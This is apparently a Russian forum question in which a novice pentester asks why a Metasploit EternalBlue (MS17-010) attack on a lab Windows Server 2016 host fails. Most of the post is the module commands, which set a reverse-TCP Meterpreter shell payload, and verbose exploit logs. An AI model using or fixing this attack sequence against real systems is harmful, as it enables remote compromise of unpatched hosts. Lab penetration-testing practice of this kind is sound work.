Использование Eternalblue в Windows server 2016(в рамках пентеста)

Здравствуйте, я недопентестер(не закидывайте помидорами) и сразу к вопросу. Есть windows server 2016 14393. Хочу к нему попасть через kali linux используя eternalblue. Сеть одна в NAT. Фаерволл на сервере отключен. Пинг в обе стороны проходит. А теперь список команд: use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.115.132(kali) set RHOST 192.168.115.128(server) exploit При запуске выводит такой список: [] 192.168.115.128:445 - Connecting to target for exploitation. [+] 192.168.115.128:445 - Connection established for exploitation. [+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply [] 192.168.115.128:445 - CORE raw buffer dump (45 bytes) [] 192.168.115.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [] 192.168.115.128:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [] 192.168.115.128:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply [] 192.168.115.128:445 - Trying exploit with 22 Groom Allocations. [] 192.168.115.128:445 - Sending all but last fragment of exploit packet [] 192.168.115.128:445 - Starting non-paged pool grooming [+] 192.168.115.128:445 - Sending SMBv2 buffers [+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [] 192.168.115.128:445 - Sending final SMBv2 buffers. [] 192.168.115.128:445 - Sending last fragment of exploit packet! [] 192.168.115.128:445 - Receiving response from exploit packet [+] 192.168.115.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [] 192.168.115.128:445 - Sending egg to corrupted connection. [] 192.168.115.128:445 - Triggering free of corrupted buffer. [-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.115.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [] Exploit completed, but no session was created.

Либо же во время запуска, сервер уходит в перезагрузку.

Дополнительно использовал опцию set VERBOSE true При повторном запуске выдает результат: msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] 192.168.115.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [*] 192.168.115.128:445 - Connected to \192.168.115.128\IPC$ with TID = 2050 [*] 192.168.115.128:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0 [+] 192.168.115.128:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit) [*] 192.168.115.128:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.115.128:445 - The target is vulnerable. [*] 192.168.115.128:445 - Connecting to target for exploitation. [+] 192.168.115.128:445 - Connection established for exploitation. [+] 192.168.115.128:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.115.128:445 - CORE raw buffer dump (45 bytes) [*] 192.168.115.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.115.128:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva [*] 192.168.115.128:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.115.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.115.128:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.115.128:445 - Sending all but last fragment of exploit packet [*] 192.168.115.128:445 - Sending NT Trans Request packet [*] 192.168.115.128:445 - Making :eb_trans2_zero packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Making :eb_trans2_buffer packet [*] 192.168.115.128:445 - Sending malformed Trans2 packets [*] 192.168.115.128:445 - Starting non-paged pool grooming [*] 192.168.115.128:445 - Sending start free hole packet. [+] 192.168.115.128:445 - Sending SMBv2 buffers [*] 192.168.115.128:445 - Sending end free hole packet. [+] 192.168.115.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.115.128:445 - Sending final SMBv2 buffers. [*] 192.168.115.128:445 - Sending last fragment of exploit packet! [*] 192.168.115.128:445 - Making :eb_trans2_exploit packet [*] 192.168.115.128:445 - Receiving response from exploit packet [+] 192.168.115.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.115.128:445 - Sending egg to corrupted connection. [*] 192.168.115.128:445 - Triggering free of corrupted buffer. [*] Started bind TCP handler against 192.168.115.128:4444 [-] The connection was refused by the remote host (192.168.115.128:4444). [-] The connection was refused by the remote host (192.168.115.128:4444).

Заранее спасибо!!!